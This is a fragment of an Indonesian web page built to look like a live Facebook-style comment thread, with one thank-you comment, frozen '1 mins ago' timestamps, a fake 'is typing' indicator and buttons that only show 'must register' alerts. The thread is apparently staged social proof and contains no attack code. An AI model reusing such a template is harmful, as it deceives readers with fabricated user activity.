<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                   
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div> 
<!-- Start List Comment 18 -->  
<div class="fb_comment_wrapper">
<div class="fb_image_block"><img src="https://ln.run/dD0OJ" class="fb_pic"></div>
<div class="fb_comment_block">
<div class="fb_name">Intan</div>
<div class="fb_comment">Makasih bgt loh Wahyu ternyata kamu orangnya hhe</div></div>
<div class="fb_meta">
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Like</a> "
<a onclick="JavaScript:alert('You must create an account before commenting.')" class="fb_like fb_meta_item">Reply</a> "
<img class="fb_like_button fb_meta_item" src="https://bit.ly/3sgberf"><span class="like_count fb_meta_item"></span> "
<span class="fb_timestamp"><div class="fb_image_block">
</div>1 mins ago</span></div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                      
<img src="https://i.pinimg.com/originals/49/d3/90/49d390ed4b730c2a927c82c62baa0e43.gif" style="width:20%; height:auto;" alt="avatar">    is typing</div><br>    
</div>  
 
  
  
</ul></div></div></div></div><br>             
<center><div>
  

        <button class="btn btn-primary" style="padding: 5px;" onclick="JavaScript:alert('You must register to see more comments')" data-backdrop="static"><b> &lt;&lt; </b></button>&nbsp;&nbsp;
        <button class="btn btn-primary" style="padding: 5px;" onclick="JavaScript:alert('You must register to see more comments')" data-backdrop="static"><b>&nbsp;1&nbsp;</b></button>&nbsp;&nbsp;
        <button class="btn btn-primary" style="padding: 5px;" onclick="JavaScript:alert('You must register to see more comments')" data-backdrop="static"><b>&nbsp;2&nbsp;</b></button>&nbsp;&nbsp;
        <button class="btn btn-primary" style="padding: 5px;" onclick="JavaScript:alert('You must register to see more comments')" data-backdrop="static"><b>&nbsp;3&nbsp;</b></button>&nbsp;&nbsp;
        <button class="btn btn-primary" style="padding: 5px;" onclick="JavaScript:alert('You must register to see more comments')" data-backdrop="static"><b>&nbsp;4&nbsp;</b></button>&nbsp;&nbsp;
        <button class="btn btn-primary" style="padding: 5px;" onclick="JavaScript:alert('You must register to see more comments')" data-backdrop="static"><b>&nbsp;5&nbsp;</b></button>&nbsp;&nbsp;
        <button class="btn btn-primary" style="padding: 5px;" onclick="JavaScript:alert('You must register to see more comments)" data-backdrop="static"><b>&gt;&gt;</b></button>&nbsp;&nbsp;
</div></center><br>      
<center><div><button class="btn btn-primary" style="padding: 15px;" onclick="JavaScript:alert('You Must Register To Leave Comment')" data-backdrop="static"><span class="fa fa-comments-o"></span><b>&nbsp;TINGGALKAN KOMENTAR</b></button></div></center><br>

 
  
</div></body></html>
